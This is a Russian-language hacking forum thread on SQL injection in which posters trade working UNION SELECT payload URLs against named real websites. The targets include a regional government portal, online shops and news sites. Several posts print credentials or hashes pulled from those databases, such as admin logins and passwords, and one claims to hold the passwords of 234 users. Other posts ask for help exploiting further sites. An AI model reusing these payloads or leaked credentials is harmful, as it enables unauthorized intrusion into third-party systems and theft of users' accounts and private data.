SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. IIAHbI4

    IIAHbI4 Banned

    Joined:
    24 Aug 2006
    Messages:
    276
    Likes Received:
    331
    Reputations:
    11
    ты наркоман? этого
    Database name: db_bgmaker
    User name: [email protected]

    не достаточно ?
     
  2. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    Правительство Амурской области
    http://www.amurobl.ru/index.php?m=&r=3&c=-1/**/union/**/select/**/0,1,2,3,version(),5,6/*
     
  3. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    http://www.weed.ru/pphlogger/edCss.php?css_str=-1%20union%20select%20null,null,id,username,pw,version(),null,null,null,null,null,null,null,null,null,null,null,null,
    null,null,null,null,null,null,null,null,null%20from%20pphl_users%20limit%200,1&action=edit

    PS: auth:
    имя: blacksun
    пароль: B1kC9i4P
     
  4. tor4)

    tor4) Elder - Старейшина

    Joined:
    27 May 2008
    Messages:
    45
    Likes Received:
    21
    Reputations:
    -6
    sql иньекциях не силен по этому и хочу разобраться чё к чему

    www.rayner.com

    Поехали)
    http://www.rayner.com/products.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9+from+mysql.user/*
    5.0.32-Debian_7etch1-log

    http://www.rayner.com/products.php?id=-1+union+select+1,2,3,user,5,6,7,8,9+from+mysql.user/*
    Даёт user их 5.

    http://www.rayner.com/products.php?id=-1+union+select+1,2,3,password,5,6,7,8,9+from+mysql.user/*
    а по такому запросу пишет как я по нимаю пароли в зашифровки mb5.

    *0EF29B1AED94CC60062FED7F4DF2224A0C880A10
    *6F0D804E0EB35256C22367F95D8D1E31A4E5BAAD
    *7351A8BF4BD4C9E8FD20109F24916B9C93ADBF83
    *8050739003BBDB60551FA99B5FFF34957C4F5F49


    Тек ли это и стоит ли тратить време на их расшифровку??? :confused: :confused: :confused:
     
    1 person likes this.
  5. Shram-spb

    Shram-spb Member

    Joined:
    6 Jun 2007
    Messages:
    64
    Likes Received:
    42
    Reputations:
    35
    Code:
    http://zoorinok.com.ua/zoo_details.php?id=-9061+union+select+1,2,3,4,5,6,7,8,9,0,1,concat_ws(char(58),username,user_password,user_icq,user_email),3,4,5,6,7,8,9,0,1,2,3,4,5+from+phpbb_users/*
    
     
  6. XiD

    XiD Member

    Joined:
    2 Jun 2008
    Messages:
    3
    Likes Received:
    13
    Reputations:
    5
    www.pilot-film.com

    http://www.pilot-film.com/index.php?p=show_person&pid=-2+union+select+1,2,3,4,5,6,7,8,9,10/*
     
    1 person likes this.
  7. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    tor4)
    это не MD5, это mysql(des..) тебе сюда http://forum.antichat.ru/thread12768.html

    или.. вытаскивай пароли админов сайтов. например:
    или можно вобще весь сервак похекать..

    Apache/2.2.3 (Debian) PHP/4.4.4-8+etch4 mod_ssl/2.2.3 OpenSSL/0.9.8c Server at www.rayner.com Port 80

    уязвимость - Apache Mod SSL Util UUEncode Binary Stack Buffer Overflow Vulnerability

    + еще есть ХСС.. и BlindSQL.

    наврено сайт для тренеровки сделан ;)
     
    #5567 sabe, 5 Jun 2008
    Last edited: 5 Jun 2008
  8. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    пока разбеаюсь с этой:
     
    #5568 sabe, 5 Jun 2008
    Last edited: 6 Jun 2008
  9. $p01nt

    $p01nt Elder - Старейшина

    Joined:
    19 Feb 2008
    Messages:
    116
    Likes Received:
    20
    Reputations:
    1
    www.saltillo.com

    Уязвимость:

    Code:
    http://www.saltillo.com/products/index.php?product=36&product_id=15'
    Столбцы:

    Code:
    http://www.saltillo.com/products/index.php?product=36&product_id=15+union+select+1,2,3,4,5,6,7,8,9,0/*
    Информация:

    Code:
    4.0.27-log
    contentdata
    saltillo@localhost   
    
    P.S. скиньте в пм ссылки на инфу о инжектах в 4ых базах
     
    1 person likes this.
  10. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    Помогите..
    Вобщем Http://truba.karelia.ru
    просто добавил к этому http://truba.karelia.ru/ls_server
    и получилось

    error:

    MySql error: Unknown column 'shuric' in 'where clause'

    query: SELECT `ls_folders`.`folder_id`, `ls_folders`.`folder_name`, `ls_folders`.`system_folder`, `ls_contacts`.`user_passport_login`, `ls_contacts`.`contact_passport_login`, `ls_contacts`.`contact_name`, `ls_contacts`.`message_size`, `ls_contacts`.`create` FROM `ls_contacts` LEFT JOIN `ls_folders` ON `ls_contacts`.`folder_id`=`ls_folders`.`folder_id` WHERE `ls_contacts`.`contact_id`=shuric AND `ls_contacts`.`user_passport_login`='romanp' LIMIT 1

    Может кто поможет че нить придумать с этим сайтиком?
     
    2 people like this.
  11. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    Cantonrep.com
    токо она слепая.. что можно сделать?
     
    #5571 sabe, 5 Jun 2008
    Last edited: 5 Jun 2008
  12. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    750
    Likes Received:
    1,046
    Reputations:
    291
    http://www.cantonrep.com/index.php?ID=1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
    слепая чтоли? :confused:
     
    #5572 Dimi4, 5 Jun 2008
    Last edited: 5 Jun 2008
    1 person likes this.
  13. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    www.hostcheck.net

    admin:f1bo24:Sarath
     
  14. S00pY

    S00pY Active Member

    Joined:
    24 Apr 2007
    Messages:
    91
    Likes Received:
    109
    Reputations:
    21
    _http://www.cantonrep.com/index.php?ID=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
    Сори запостил не обновляя ветку)




     
    #5574 S00pY, 5 Jun 2008
    Last edited: 5 Jun 2008
    1 person likes this.
  15. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    Breitbart.com
    подбираю.. помощь приветствуется..)
     
  16. tor4)

    tor4) Elder - Старейшина

    Joined:
    27 May 2008
    Messages:
    45
    Likes Received:
    21
    Reputations:
    -6
    Вот бажный скрипт)
    breitbart:breitbart@localhost:4.1.20-log
    Жопный вариант подобрать Имя таблици не получилось :(
     
    1 person likes this.
  17. hOd

    hOd New Member

    Joined:
    16 Mar 2008
    Messages:
    6
    Likes Received:
    4
    Reputations:
    0
    http://www.horsens-emballage.dk/products.php?id=121+union+select%201,user(),3,4,5
     
    1 person likes this.
  18. piton

    piton New Member

    Joined:
    14 Sep 2006
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0
    http://doshirak.com/PWE/etc/loader.php?mid='75&mode=local&module=/etc/checkanswer&template=checkanswer.aj

    помогите раскрутить и вообще рабочая она ли ?
     
    1 person likes this.
  19. Ponchik

    Ponchik Хлебо-булочное изделие

    Joined:
    30 Aug 2005
    Messages:
    687
    Likes Received:
    807
    Reputations:
    311
    Секс шоп
    _http://eroshop.com.ua/?sec=det&id=0'+UNION+SELECT+1,2,concat(login,0x3a,password),4,5,6,7,8,9,10,11,12,13,14+FROM+users/*
    Admin:19820429
     
    1 person likes this.
  20. DDoSька

    DDoSька Elder - Старейшина

    Joined:
    5 May 2008
    Messages:
    317
    Likes Received:
    352
    Reputations:
    18
    http://www.paintball.ru/next.php?id=999919+union+select+1,2,concat(USER(),0x3a,VERSION(),0x3a,DATABASE())
    user:paintball_user@localhost
    version:5.0.51a-community-log
    -------------------------------------------------------------------------------------------------------------------
    http://www.paintball.ru/next.php?id=999919+union+select+1,2,concat(login,0x3a,pass,0x3a)+from+pb_users
    +limit+1,1
    логины и пароли от 234 пользователей
    -------------------------------------------------------------------------------------------------------------------
    там еще много чего...
     
    1 person likes this.
Thread Status:
Not open for further replies.